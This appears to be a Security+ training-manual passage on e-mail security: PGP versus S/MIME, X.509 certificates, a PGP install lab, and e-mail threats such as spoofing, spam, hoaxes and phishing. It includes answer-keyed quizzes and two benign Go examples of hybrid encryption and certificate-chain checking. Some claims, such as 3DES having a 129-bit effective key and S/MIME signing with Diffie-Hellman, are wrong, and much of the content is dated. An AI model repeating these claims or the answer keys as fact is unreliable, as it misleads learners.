          1 Match the following symmetric algorithms with their definitions:
            CAST      IDEA     3DES      Twofish

            Offers 128-bit, 192-bit, and 256-bit keys and included in PGP in 2001         Twofish

            Uses a 128-bit key and available to anyone on a royalty-free basis            CAST

            Uses a 56-bit key but runs the same algorithm three times to produce          3DES
            an effective key strength of 129 bits

            Uses a 128-bit key and is licensed by Ascom Systec                            IDEA

          2 One unique aspect of the PGP certificate format is that a single certificate can
            contain:
            A    Single signatures
            B    Multiple signatures
            C    Multiple public keys
            D    Multiple algorithms

          3 Which of the following is contained within a PGP certificate? (Choose all that
            apply.)
            A    PGP version number
            B    Certificate holder’s private key
            C    Certificate holder’s information
            D    Digital signature of the certificate owner
            E    Preferred symmetric encryption algorithm for the key

                     Background on S/MIME
Explanation          S/MIME is a protocol for secure electronic mail and was designed to add security to e-
                     mail messages in MIME format. The security services offered are authentication (using
                     digital signatures) and privacy (using encryption).
                     S/MIME v3 was made a standard in July, 1999, by IETF’s S/MIME Working Group.
                     The S/MIME v3 standard consists of six parts:
                         • Diffie-Hellman Key Agreement Method (RFC 2631)
                         • S/MIME Version 3 Certificate Handling (RFC 2632)
                         • S/MIME Version 3 Message Specification (RFC 2633)
                         • Enhanced Security Services for S/MIME (RFC 2634)
                         • Cryptographic Message Syntax (RFC 3369)
                         • Cryptographic Message Syntax (CMS) Algorithms (RFC 3370)

                     S/MIME encryption algorithms
                     S/MIME development began in 1995, and because the specification needed to work
                     within the U.S. government export controls that existed until recently, S/MIME
                     implementations have been required to support 40-bit RC2 (Rivest Cipher 2, a
                     symmetric encryption cipher owned by RSA Data Security), which is known to be a
                     very weak algorithm. Although 3DES is also a supported algorithm, and is in fact
                     recommended, some have criticized S/MIME for being cryptographically weak, but it is
                     only weak if a weak algorithm is chosen. The specification is very clear on the subject.
                     Forty-bit encryption is considered weak by most cryptographers. Using weak
                     cryptography in S/MIME offers little actual security over sending plaintext; however,
                     other features of S/MIME, such as the specification of 3DES and the ability to announce
                     stronger cryptographic capabilities to parties with whom you communicate, allow
                     senders to create messages that use strong encryption. (RFC 2633, page 24)
                     S/MIME recommends three symmetric encryption algorithms: DES, 3DES, and RC2.
                     The adjustable key size of the RC2 algorithm makes it useful for applications intended
                     for export outside the U.S.
                     In some environments, hiding the identity of the sender is a requirement. This is in an
                     effort to prevent traffic analysis, where an eavesdropper could gain valuable information
                     on the communicants even if the message cannot be read. To thwart this, these
                     environments use anonymous e-mailers or gateways that strip off the originating e-mail
                     address. A digital signature could give the eavesdropper another piece of data to identify
                     the sender, who is also the signer. S/MIME prevents this by applying the digital
                     signature first, and then enclosing the signature and the original message in an
                     encrypted digital envelope. In this way, no signature information is exposed to the
                     eavesdropper.
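                     The sequence rehearsed in the Topic A questions (compress the plaintext, generate a
                     random session key, encrypt the message with it, encrypt the session key with the
                     recipient’s public key, and send the two bound together) and the sign-then-encrypt
                     ordering just described, which keeps the signature inside the encrypted envelope,
                     can both be seen in the following added example. It was written for this edition in
                     Go and is not code from the manual, from PGP or from any S/MIME product. It
                     assumes AES-GCM as the symmetric cipher and RSA-OAEP and RSA-PSS in place of the
                     algorithms the text names, takes its randomness from the operating system rather
                     than from mouse and keystroke timing, and the names Envelope, NewKeyPair, Seal
                     and Open are choices made for the example.

```go
package main

import (
	"bytes"
	"compress/zlib"
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
)

// Envelope travels as one unit: the session key wrapped for the recipient,
// bound to the ciphertext it protects.
type Envelope struct {
	WrappedKey []byte // session key encrypted with the recipient's RSA public key
	Nonce      []byte // AES-GCM nonce, fresh for every message
	Ciphertext []byte // zlib(signature || message) encrypted under the session key
}

// NewKeyPair generates a 2048-bit RSA key pair, standing in for a user's PGP or S/MIME key.
func NewKeyPair() (*rsa.PrivateKey, error) { return rsa.GenerateKey(rand.Reader, 2048) }

// newGCM wraps a raw session key in AES-GCM, used here in place of CAST, IDEA, 3DES or Twofish.
func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil { return nil, err }
	return cipher.NewGCM(block)
}

// Seal signs msg with the sender's private key, then compresses and encrypts
// signature+message under a fresh random session key, and wraps that key for
// the recipient. Signing first and keeping the signature inside the encrypted
// body means an eavesdropper never sees it (the S/MIME ordering).
func Seal(sender *rsa.PrivateKey, recipient *rsa.PublicKey, msg []byte) (*Envelope, error) {
	digest := sha256.Sum256(msg)
	sig, err := rsa.SignPSS(rand.Reader, sender, crypto.SHA256, digest[:], nil)
	if err != nil { return nil, err }
	// Inner layout (constructed for this example): fixed-size RSA signature, then the message.
	inner := append(append([]byte{}, sig...), msg...)
	// Compress before encrypting, as PGP does, to remove plaintext patterns.
	var compressed bytes.Buffer
	zw := zlib.NewWriter(&compressed)
	zw.Write(inner)
	zw.Close()
	// Session key and nonce come from the OS CSPRNG (PGP gathers its randomness
	// from mouse movements and keystrokes instead; the principle is the same).
	kn := make([]byte, 16+12)
	if _, err := io.ReadFull(rand.Reader, kn); err != nil { return nil, err }
	sessionKey, nonce := kn[:16], kn[16:]
	gcm, err := newGCM(sessionKey)
	if err != nil { return nil, err }
	ciphertext := gcm.Seal(nil, nonce, compressed.Bytes(), nil)
	// Protect the session key in transit with the recipient's public key (RSA-OAEP).
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, recipient, sessionKey, nil)
	if err != nil { return nil, err }
	return &Envelope{WrappedKey: wrapped, Nonce: nonce, Ciphertext: ciphertext}, nil
}

// Open reverses Seal: unwrap the session key with the recipient's private key,
// decrypt, decompress, split off the signature and verify it with the sender's
// public key. Modification in transit or a wrong sender key yields an error.
func Open(recipient *rsa.PrivateKey, sender *rsa.PublicKey, env *Envelope) ([]byte, error) {
	sessionKey, err := rsa.DecryptOAEP(sha256.New(), nil, recipient, env.WrappedKey, nil)
	if err != nil {
		return nil, errors.New("cannot unwrap session key: not the intended recipient")
	}
	gcm, err := newGCM(sessionKey)
	if err != nil { return nil, err }
	compressed, err := gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
	if err != nil {
		return nil, errors.New("ciphertext was modified in transit")
	}
	zr, err := zlib.NewReader(bytes.NewReader(compressed))
	if err != nil { return nil, err }
	inner, err := io.ReadAll(zr)
	if err != nil || len(inner) < sender.Size() {
		return nil, errors.New("malformed inner payload")
	}
	sig, msg := inner[:sender.Size()], inner[sender.Size():]
	digest := sha256.Sum256(msg)
	if err := rsa.VerifyPSS(sender, crypto.SHA256, digest[:], sig, nil); err != nil {
		return nil, errors.New("signature does not verify: sender not authenticated")
	}
	return msg, nil
}

func main() {
	alice, _ := NewKeyPair()
	bob, _ := NewKeyPair()
	env, _ := Seal(alice, &bob.PublicKey, []byte("Constructed sample: purchase order approved."))
	got, err := Open(bob, &alice.PublicKey, env)
	fmt.Printf("recovered=%q err=%v\n", got, err)
}
```

                     Two details of the design carry the lesson of the surrounding text. The wrapped
                     session key is one RSA block and is useless without the recipient’s private key, so
                     a third party who captures the envelope can neither read the message nor see who
                     signed it; and because AES-GCM is an authenticated cipher, a modified ciphertext is
                     rejected before the signature is even examined, while a signature made with a key
                     other than the expected sender’s is rejected after decryption.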

                     X.509 certificates
                     Rather than define its own certificate type as PGP does, S/MIME relies on the X.509
                     certificate standard.
                     To obtain an X.509 certificate, you must ask a certificate authority (CA) to issue one.
                     You provide your public key, proof that you possess the corresponding private key, and
                     some specific information about yourself. You then digitally sign the information and
                     send the whole package—the certificate request—to the CA. The CA then performs
                     some due diligence in verifying the information you provided is correct and, if so,
                     generates the certificate and returns it.

                     You might think of an X.509 certificate as looking like a standard paper certificate
                     (similar to one you might have received for completing a class in basic first aid) with a
                     public key taped to it. It has your name and some information about you on it, plus the
                     signature of the person who issued it to you. For an outline of the contents of X.509
                     certificates, see the table below:

                      Certificate                               Certificate format

                      X.509 version                             Identifies which version of the X.509 standard applies to
                                                                this certificate, which in turn determines what
                                                                information can be specified in it.

                      Certificate holder’s public key           Public key of the certificate holder, together with an
                                                                algorithm identifier that specifies which cryptosystem
                                                                the key belongs to and any associated key parameters.

                      Serial number of the certificate          Unique serial number to distinguish it from other
                                                                certificates issued. This information is used in
                                                                numerous ways; for example, when a certificate is
                                                                revoked, its serial number is placed on a certificate
                                                                revocation list (CRL).

                      Certificate holder’s distinguished        Intended to be unique across the Internet, a DN consists
                      name (DN)                                 of multiple subsections and might look something like this:

                                                                CN=Jonathan Public, E-MAIL=jonathanpublic@hotmail.com,
                                                                OU=Security Team, O=Consulting Inc., C=US

                                                                (These refer to the subject’s Common Name, Organizational
                                                                Unit, Organization, and Country.)

                      Certificate’s validity period             Start date/time and expiration date/time.

                      Unique name of the certificate issuer     Unique name of the entity that signed the certificate.
                                                                This is normally a CA. Using the certificate implies
                                                                trusting the entity that signed this certificate.

                      Digital signature of the issuer           Signature using the private key of the entity that issued
                                                                the certificate.

                      Signature algorithm identifier            Algorithm used by the CA to sign the certificate.



S/MIME trust model: certificate authorities
S/MIME was designed from the outset as a purely hierarchical model. Keys or
certificates are trusted based on the trustworthiness of the issuer, which is assumed to be
of a higher value than that of the user. The line of trust can be followed up the chain of
certificates to some root, which is generally a large commercial organization, a
certificate authority engaged purely in the business of verifying identity and assuring the
validity of keys or certificates.
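To make the certificate fields in the table and the line of trust just described
concrete, here is an added example that acts as a very small certificate authority.
It was written for this edition in Go with the standard crypto/x509 package and is
not code from the manual or from any CA product. It self-signs a root, issues a
certificate for the sample distinguished name from the table, reports the fields the
table lists, and verifies the chain from the user certificate up to the root; the
same check fails when an unrelated root is offered, which is the hierarchical model
in action. The names NewCA, IssueUserCert, Fields and VerifyChain, the organization
names, the serial numbers and the validity periods are assumptions made for the
example.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Identity is a certificate together with the private key matching its public key.
type Identity struct {
	Cert *x509.Certificate
	Key  *rsa.PrivateKey
}

// makeCert generates a key pair, has issuer sign tmpl for it and parses the result.
// With issuer == nil the template signs itself, which is how a root CA is made.
func makeCert(tmpl *x509.Certificate, issuer *Identity) (*Identity, error) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil { return nil, err }
	parent, signer := tmpl, key
	if issuer != nil {
		parent, signer = issuer.Cert, issuer.Key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, signer)
	if err != nil { return nil, err }
	cert, err := x509.ParseCertificate(der)
	if err != nil { return nil, err }
	return &Identity{Cert: cert, Key: key}, nil
}

// NewCA creates a self-signed root: the top of the hierarchy, trusted by assumption.
func NewCA(org string) (*Identity, error) {
	return makeCert(&x509.Certificate{
		SerialNumber:          big.NewInt(1),
		Subject:               pkix.Name{CommonName: org + " Root CA", Organization: []string{org}, Country: []string{"US"}},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().AddDate(10, 0, 0),
		IsCA:                  true,
		BasicConstraintsValid: true,
		KeyUsage:              x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
	}, nil)
}

// IssueUserCert plays the CA: after its due diligence (out of scope here) it binds the
// user's public key and identity to its own signature, valid for one year.
func IssueUserCert(ca *Identity, serial int64, cn, email, ou, org string) (*Identity, error) {
	return makeCert(&x509.Certificate{
		SerialNumber:   big.NewInt(serial),
		Subject:        pkix.Name{CommonName: cn, OrganizationalUnit: []string{ou}, Organization: []string{org}, Country: []string{"US"}},
		EmailAddresses: []string{email}, // clients carry the e-mail address in the SAN extension
		NotBefore:      time.Now().Add(-time.Hour),
		NotAfter:       time.Now().AddDate(1, 0, 0),
		KeyUsage:       x509.KeyUsageDigitalSignature | x509.KeyUsageKeyEncipherment,
		ExtKeyUsage:    []x509.ExtKeyUsage{x509.ExtKeyUsageEmailProtection},
	}, ca)
}

// Fields pulls out the components the X.509 table lists.
func Fields(c *x509.Certificate) map[string]string {
	return map[string]string{
		"version":        fmt.Sprint(c.Version),
		"serial":         c.SerialNumber.String(),
		"subject_dn":     c.Subject.String(),
		"issuer_dn":      c.Issuer.String(),
		"not_before":     c.NotBefore.UTC().Format(time.RFC3339),
		"not_after":      c.NotAfter.UTC().Format(time.RFC3339),
		"public_key_alg": c.PublicKeyAlgorithm.String(),
		"signature_alg":  c.SignatureAlgorithm.String(),
	}
}

// VerifyChain follows the line of trust from leaf up to root, as an S/MIME client does
// before trusting a signer: issuer signature, validity period, CA constraints and key
// usage are all checked. A root that did not sign the leaf yields an error.
func VerifyChain(leaf, root *x509.Certificate) error {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	_, err := leaf.Verify(x509.VerifyOptions{
		Roots:     roots,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageEmailProtection},
	})
	return err
}

func main() {
	ca, _ := NewCA("Consulting Inc.")
	user, _ := IssueUserCert(ca, 42, "Jonathan Public", "jonathanpublic@hotmail.com", "Security Team", "Consulting Inc.")
	for k, v := range Fields(user.Cert) {
		fmt.Printf("%-15s %s\n", k, v)
	}
	fmt.Println("chain to issuing CA:", VerifyChain(user.Cert, ca.Cert))
	rogue, _ := NewCA("Unrelated")
	fmt.Println("chain to unrelated CA:", VerifyChain(user.Cert, rogue.Cert))
}
```

Running it prints the version, serial number, subject and issuer DNs, validity
window and algorithm identifiers of the user certificate, then a nil error for the
chain to the issuing CA and a verification error for the unrelated root. Note that
Verify also rejects a certificate outside its validity period and a parent that lacks
the certificate-signing key usage, so the table’s fields are not just descriptive:
each one is consulted when trust is decided.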

                  Differences between PGP and S/MIME
                  S/MIME 3 (the current version, which has been accepted as an IETF standard) and
                  OpenPGP (the open, standards-based version that grew out of PGP in 1997) are both
                  protocols for adding authentication and privacy to messages. They differ in many ways,
                  however, and are not designed to be interoperable. Some cryptography algorithms are
                  the same between the two protocols, but others differ. The following table provides a
                  comparison of the two protocols:

                    Features                              S/MIME 3                                   OpenPGP

                    Structure of messages                 Binary, based on CMS                       PGP

                    Structure of digital certificates     X.509                                      PGP

                    Algorithm: symmetric encryption       3DES                                       3DES

                    Algorithm: digital signature          Diffie-Hellman                             ElGamal

                    Algorithm: hash                       SHA-1                                      SHA-1

                    MIME encapsulation for signed data    Choice of multipart/signed or CMS          Multipart/signed with ASCII armor
                                                          format

                    MIME encapsulation for encrypted      Application/PKCS#7-MIME                    Multipart/encrypted
                    data

                    Trust model                           Hierarchical                               Web of trust

                    Marketplace adoption                  Growing quickly because of use in          Current encryption standard among
                                                          Microsoft and Netscape browsers, e-mail    security professionals
                                                          clients, and in SSL encryption

                    Marketplace advocates                 Microsoft, RSA, VeriSign                   PGP, Inc., has been dissolved, but
                                                                                                     some of its products have been
                                                                                                     absorbed into the McAfee product line

                    Ease of use                           Configuration is not intuitive, and        Configuration is not intuitive, and
                                                          certificates must be obtained and          certificates must be created; general
                                                          installed; general use is straightforward  use is straightforward

                    Software                              Already integrated in Microsoft and        PGP software must be downloaded and
                                                          Netscape products (both commercial and     installed
                                                          free versions)

                    Cost of certificates                  Certificates must be purchased from a      PGP certificates can be generated by
                                                          certificate authority, and they have a     anyone and are free
                                                          yearly fee attached

                    Key management                        Easy, but you must trust a certificate     Harder because the user must make
                                                          authority                                  decisions on the validity of identities,
                                                                                                     but you have granular control over
                                                                                                     whom you trust

                    Compatibility                         Transparently works with any vendor’s      Compatible with MIME and non-MIME
                                                          MIME e-mail client, but not compatible     e-mail formats, but the recipient must
                                                          with non-MIME e-mail formats               have PGP installed

                    Centralized management                Centralized management possible through    Status of PGP’s centralized
                                                          public key infrastructure (PKI) offerings  management products in doubt


A single e-mail client could use both S/MIME and PGP, but PGP cannot be used to
decrypt S/MIME messages and vice versa. There are many differences between an
X.509 certificate and a PGP certificate, but the most important are:
    • You can create your own PGP certificate; you must request and be issued an
      X.509 certificate from a certificate authority.
    • X.509 certificates natively support only a single name for the key’s owner,
      whereas PGP allows multiple fields to describe the key’s owner.
    • X.509 certificates support only a single digital signature to attest to the key’s
      validity, but PGP allows the inclusion of many signatures that attest to the
      validity of the key.

Do it!              B-2:     Comparing S/MIME and PGP
                      Questions and answers
                       1 For each of the following characteristics, specify whether the protocol described is
                         S/MIME or PGP.

                          _____ Certificates support multiple signatures                            PGP

                          _____ Uses X.509 certificates                                             S/MIME

                          _____ Binds public key to digital signature of Certificate Authority      S/MIME

                          _____ Supports DES, 3DES, and RC2 algorithms                              S/MIME

                          _____ Supports CAST, IDEA, 3DES, and Twofish algorithms                   PGP

                          _____ Encrypts the digital signature                                      S/MIME

                          _____ Binds public key to digital signature of certificate owner          PGP

                          _____ Bundled with Microsoft and Netscape products                        S/MIME

                          _____ Software must be downloaded                                         PGP

                          _____ Uses a hierarchical trust model                                     S/MIME

                               Using PGP to encrypt and sign e-mail
 Explanation                   To demonstrate how PGP is installed and configured to be able to encrypt and digitally
                               sign e-mail, you will now work through the following steps:
                                   • Installing and configuring PGP (including generating PGP keys)
                                   • Exporting public keys
                                   • Importing public keys
                               The first step is to install and configure PGP on your workstation. PGP can be
                               downloaded free from the International PGP Home Page
                               (www.pgp.com/downloads/desktoptrial.html). To save you some time and
                               protect your privacy, your instructor has already downloaded the software for you. After
                               you've installed PGP, a wizard starts to guide you through the initial setup steps,
                               including generating a PGP key.

 In previous versions of this course, a Hotmail account was used to exchange the public key
 between students and to send encrypted e-mail using Outlook Express. Hotmail, Yahoo, and
 other free e-mail providers no longer support managing their mail through Outlook Express
 using their free e-mail accounts.


Do it!                         B-3:    Installing and configuring PGP

See the classroom setup instructions for the location of the download file.

                                Here’s how                                Here’s why
                                 1 Download the PGP software              According to your instructor’s directions.

                                 2 Extract the zipped file to
                                    C:\Security

                                    Open C:\Security

                                 3 Run the                                To start the installation.
                                    PGPDesktop902_Inner
                                    program

                                    Click English

                                 4 Select I accept the license
                                    agreement

                                 5 Click Next

                                 6 Click Next                             The file copy starts.

                                 7 Click Yes                              To restart your computer.

                                 8 Log in as Administrator                The PGP Setup Assistant starts automatically.

                                 9 Click Next

                                10 Enter user information in the          Enter Student## for Name, Class for
                                   fields provided and then click         Organization and a fictional e-mail address.
                                    Next

Do not have students enter the evaluation license you received with the download. If you do,
all but the first student to enter and submit the license number will receive an error message
when trying to license the program.

                               11 Select Use without a license      The functionality necessary for the PGP-related
                                  and disable most                  activities will still be available.
                                  functionality

                                  Click Next

                               12 Click Next

                               13 Click Next                        To accept the default of I am a new user.

                               14 Click Next                        To specify that you want to generate a PGP key.

                               15 Enter Student## and a fictional
                                  Yahoo e-mail address

                                  Click Next

                               16 Check Show Keystrokes             To view your keystrokes.

                                  Enter a passphrase                A longer passphrase is desirable for security
                                                                    reasons.

                                  Reenter the passphrase            To confirm.

                               17 Click Next                        To generate the key.

                               18 Click Next

                               19 Click Next                        To accept the default of automatically detecting
                                                                    e-mail accounts.

                               20 Click Next                        To accept the default outgoing e-mail policies.

                               21 Click Finish

                              Export and import public keys
Explanation                   PGP makes this process very easy by allowing you to export your public key to a text
                              file. You can then send the public key to the person who needs to send you encrypted
                              data.
                              Once the person receives the key, they can import it into PGP. After that, they can send
                              you encrypted messages.

Do it!                        B-4:    Exporting and importing the public key
                               Here’s how                                Here’s why
                               1 Launch PGP                              (If necessary.) Click Start, then choose All
                                                                         Programs, PGP, PGP Desktop.

                                  Right-click Student##

                               2 Choose Export...

Make sure students have removable media available on which to save the exported file.

                               3 Save the file to a removable media      Save the file to the removable media with which
                                 device using the default file name      your instructor has provided you.

                               4 Give the removable media to your
                                 partner

                               5 Insert your partner's removable media
                                 into the appropriate drive or port

                               6 Choose File, Import…

                               7 Navigate to the removable media

                                  Select Student##.asc

                                  Click Open

Due to an incompatibility between PGP and Network Monitor (which is used in the unit on
transmission and storage media) in Windows Server 2003, students have to uninstall PGP when
finished with activity B-4.

                               8 Click Import                            The key is imported to PGP.

                               9 Close PGP

                              10 Click Start and then choose
                                 Control Panel, Add or
                                 Remove Programs

                              11 Select PGP Desktop, then click          To start the process of uninstalling PGP. This is
                                  Remove                                 necessary due to an incompatibility between
                                                                         PGP and Network Monitor (which is used in the
                                                                         unit on transmission and storage media) in
                                                                         Windows Server 2003.

                              12 Follow the prompts to uninstall
                                 the program and then reboot the
                                 computer


Topic C: E-mail vulnerabilities
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          2.2    Recognize and understand the administration of the following e-mail security concepts
                                    • Vulnerabilities
                                       • SPAM
                                       • Hoaxes




                         Vulnerabilities
Explanation              E-mail has an incredible number of vulnerabilities; moreover, because it’s the one
                         electronic tool that almost everyone uses, e-mail is attacked frequently. As
                         demonstrated so far, a large number of e-mail vulnerabilities can be addressed using a
                         combination of best practices, virus-scanning software, and secure e-mail. The table
                         below outlines the more common e-mail vulnerabilities and countermeasures for each:

                          Attack                        Vulnerability                           Solution

                          Eavesdropping                 Lack of confidentiality; because e-     E-mail encryption for
                                                        mail is sent in clear text, it can be   communications that require
                                                        read in transit.                        confidentiality.

                                                                                                Encrypted messages cannot be
                                                                                                effectively scanned for viruses until
                                                                                                they reach the desktop and are
                                                                                                decrypted.

  Spoofing and masquerading
    Vulnerability: Lack of authentication; dummy e-mail accounts can be set up to pose as
    trusted businesses and trick users into giving over credit card numbers and other types
    of information.
    Solution: Digital certificates issued by a trusted certificate authority prove to the
    customer that the sender of an e-mail really is who he or she says it is.

  Man-in-the-middle attack, session hijacking
    Vulnerability: Lack of authentication; by tricking e-mail servers to send their data
    through a third node, an attacker can pose as one or both people in an e-mail exchange.
    Solution: By digitally signing their data, the two parties can authenticate each other
    and be sure of the sender’s identity; they also gain the same certainty by encrypting
    their e-mails.

  Data manipulation
    Vulnerability: Lack of integrity; because e-mail data is sent as plaintext, it can be
    modified or changed in transit.
    Solution: E-mail encryption stops both the reading and manipulation of e-mails; digital
    signatures on e-mails ensure that if the data is changed in transmission, the recipient
    will know.

  Malware
    Vulnerability: Malicious software; viruses, Trojan horses, backdoors, and worms can
    spread through e-mail, destroy data, and be part of a DoS attack on e-mail servers.
    Solution: Virus filtering software on desktops, servers, and Internet gateways.
                                                                                  E-mail       5–25

  Social engineering
    Vulnerability: Repudiation; because a variety of e-mail attacks are possible, users can
    claim they did not send a given message.
    Solution: E-mail encryption and digital signatures provide nonrepudiation, because the
    sender must have their own digital certificate and passphrase to use them.

  Password guessing
    Vulnerability: A wide variety of password guessing attacks can be used against a PGP key
    or X.509 digital certificate.
    Solution: Choose a strong passphrase for your certificate or key.

  Information leaks
    Vulnerability: Users can send sensitive company data to other untrusted networks or to
    untrusted parties.
    Solution: Train users on acceptable use of e-mail; use an e-mail content filtering
    solution.




Spam
Spam is defined as the act of flooding the Internet with many copies of the same
message in an attempt to force the message on people who would not otherwise choose
to receive it. Most spam is commercial advertising, often for dubious products and get-
rich-quick schemes. Spam costs the sender very little to send, as most of the costs are
paid for by the recipient or the carriers, rather than by the sender.

E-mail spam
E-mail spam targets individual users with direct mail messages. E-mail spam lists are
often created by scanning Usenet postings, stealing Internet mailing lists, or searching
the Web for addresses. On top of that, it costs money for ISPs and online services to
transmit spam, and these costs are passed directly on to subscribers.
One particularly nasty variant of e-mail spam is spam sent to mailing lists (public or
private e-mail discussion forums). Because many mailing lists limit activity to their
subscribers, spammers use automated tools to subscribe to as many mailing lists as
possible so they can grab the lists of addresses, or they use the mailing list as a direct
target for their attacks.

Hoaxes and chain letters
Like Trojan horses, e-mail hoaxes and chain letters are a form of social engineering:
e-mail messages with content that is designed to get the reader to spread them. Unlike
Trojans, these messages do not carry a malicious payload. However, the messages they
contain are usually untrue or describe a situation that was resolved long ago. Hoaxes try
to get their victim to pass them on using several different methods, including:
    • Appearing to be an authority in order to exploit people’s natural trust
    • Generating excitement about being involved
    • Creating a sense of importance or belonging by passing along information
    • Playing on people’s gullibility or greed


                  Although one might not think of chain letters as an attack on an organization, they in
                  fact can cause as much damage as a virus if enough people take the time to read and
                  forward the message. First, there is the lost productivity of the people who read and
                  forward the message. You might think, “It only took me a minute to read the message;
                  therefore, the impact must be insignificant.” If you received the message, then you are
                  likely to be one of a group of ten people who all wasted a minute to read the message.
                  Worse, if those ten people each forward the hoax on to another ten people, then the
                  cumulative amount of time lost is about 100 minutes. It doesn’t take very long for all the
                  minutes to add up. Exhibit 5-7 illustrates just how fast the costs can mount.
                  There are even more costs. When a gullible user sends a message such as the Nuclear
                  Strike hoax, as shown in Exhibit 5-8, what is the cost to your organization’s reputation?




Exhibit 5-7: What hoaxes and chain letters really cost

Exhibit 5-8: Nuclear strike hoax

It’s likely your company’s reputation would be damaged, if not by the fact that your
employees forwarded such an embarrassingly obvious hoax, then by the fact that your
employees wasted the time of others with it. Finally, hoaxes that are fake virus warnings
cause users to take a relaxed attitude toward virus warnings. When a message comes
about a real and destructive virus, will your users believe it?

Phishing
Another scam closely related to hoaxes is phishing. This involves the perpetrator
sending e-mail to users and claiming to be a well-known company. The scammer tries
to get users to divulge personal information such as bank account numbers, social
security numbers, and other personal details. Some of the more well-known companies
that have been impersonated are eBay and PayPal. An example of the e-mail that you
might receive can be found at
www.millersmiles.co.uk/identitytheft/latest-paypal-e-mail-hoax.htm.
The e-mail often directs you to a site that appears to be legitimate. It has the look-and-
feel of the official Web site for the company being impersonated. If you are asked for
personal information, check with the company to determine whether they actually sent
you the e-mail, and check one of the hoax listing sites to see if it is a known scam.

                  Countermeasures for hoaxes
                  Although there are a number of e-mail content filtering solutions that help to mitigate
                  the effect of hoaxes and e-mail chains, the most effective and basic countermeasures are
                  an effective security awareness campaign coupled with a good e-mail policy. Here are
                  some guidelines:
                      • Create a policy and train users on what they should do when they receive a virus
                        warning. Typically, the only action they should take is to update the virus
                        definitions on their own machine. They should not forward the warning on to
                        others.
                      • Establish that the intranet site is the only authoritative source for advice on virus
                        warnings.
                      • Ensure that the intranet site displays virus and hoax information on the home
                        page and is consistently updated. For example: “The Nuclear Strike warning
                        message has been declared a hoax. Anybody receiving this warning should
                        discard it. Remember, when receiving e-mail you should never open attachments
                        that are not expected.”
                      • Inform users that if the virus warning is not listed on the intranet site, they are to
                        forward the warning to a designated account.
                      • Check one of the sites that list hoaxes and other urban legends before acting on
                        or forwarding a suspect e-mail. Examples of such sites include snopes.com,
                        hoaxbusters.ciac.org/, and any of the companies that provide anti-virus
                        software.

Do it!   C-1:   Discussing e-mail vulnerabilities
          Questions and answers
          1 What is the best way to prevent man-in-the-middle or session hijacking attacks
            against e-mail?

            Parties should encrypt their e-mail and digitally sign their data.

          2 What is the best way to protect against virus attacks attached to e-mails?
            • Use antivirus software on workstations, servers, and Internet gateways
            • Train users about safeguards when opening e-mail

          3 What is the best way to protect data from manipulation?

            Encrypt and digitally sign the e-mail

          4 How are e-mail spam lists created?
            A    Scanning Usenet postings
            B    Stealing internet mailing list
            C    Searching the Web for addresses
            D    All of the above

          5 Hoaxes try to get users to pass a hoax along using which method below?
            A    Generating excitement about being involved
            B    Playing on people’s gullibility or greed
            C    Creating a sense of importance or belonging
            D    Appearing to be an authority

          6 What is a good countermeasure for hoaxes? (Choose all that apply.)
            A    Create a policy and train users.
            B    Inform users to forward the warning if nothing is posted on the intranet site.
            C    Establish the Internet site as the only authoritative source for advice on virus
                 warnings.
            D    All of the above.


Unit summary: E-mail
Topic A              In this topic, you learned how cryptography is used to secure e-mails across insecure
                     networks. You also learned the key cryptography concepts of encryption, digital
                     signatures, and digital certificates, and how encryption methods can be combined to
                     obtain hybrid cryptosystems.
Topic B              In this topic, you learned about two encryption technologies—PGP and S/MIME. You
                     discussed that PGP is the current de facto e-mail encryption standard and S/MIME is the
                     emerging standard in e-mail encryption. You also discussed the differences between
                     PGP and S/MIME.
Topic C              In this topic, you learned that spam is a major detriment to corporate and personal e-
                     mail systems. You learned how hoaxes and e-mail chain letters can be quite damaging.
                     You also discussed how they can be combated using best practices in security
                     awareness training and e-mail content filtering software.

                     Review questions
                       1 Encryption is accomplished by taking data and passing it, along with a value, called
                         a key, through an algorithm that makes the data completely unreadable. True or
                         false?
                         True

                       2 3DES is much faster than either IDEA or CAST. True or false?
                         False: It is actually much slower.

                       3 Electronic signatures are created by using a hash function. True or false?
                         True

                       4 The private key is used for decryption and is kept secret. The public key is used for
                         encryption and is freely distributed to anyone who needs or wants it. True or false?
                         True

                       5 Digital certificates consist of which of the following?
                         A The owner’s public key, which is used to encrypt messages to its owner.
                         B One or more pieces of information that uniquely identify the owner (for
                           example, a name and e-mail address).
                         C Electronic signatures of a signee.
                         D Digital signature of the endorser, stating that the public key actually belongs to
                           the person in question.
                         E   All of the above

 6 What size key (in bits) does IDEA use?
   A 24
   B 58
   C 56
   D   128
   E 256

 7 What does IDEA stand for?
   A Internal Data Encryption Algorithm
   B   International Data Encryption Algorithm
   C International Digital Encryption Algorithm
   D Internal Digital Encryption Algorithm

 8 What key sizes (in bits) does Twofish have?
   A   128
   B   192
   C 195
   D   256
   E 500

 9 What does MD5 stand for?
   A   Message Digest v 5
   B Message Digital 5
   C Message Digitalization 5
   D Mixed Digest Standard 5

10 How many digital signatures does X.509 support to attest to the key’s validity?
   A 0
   B   1
   C Multiple
11 Public key encryption allows the symmetrical key to be distributed encrypted along
   with the __________ text.
   cipher

12 The result of a hash function is a __________ ____________.
   message digest

                  13 X.509 is the standard for digital signatures. True or false?
                      False: It is a standard for digital certificates.

                  14 Conventional encryption is normally slower than public key encryption. True or
                     false?
                      False: It is actually about 1000 times faster.

                  15 When encrypting e-mail, ____________ encryption provides the ability to compress
                     the message before encryption takes place.
                      PGP

                  16 The ______________ encryption algorithm is considered the industry standard
                     encryption algorithm today.
                      3DES

                  17 PGP uses X.509 digital certificates. True or false?
                      False: It uses PGP certificates.


Unit 6
Web security
               Unit time: 120 minutes

               Complete this unit, and you’ll know how to:

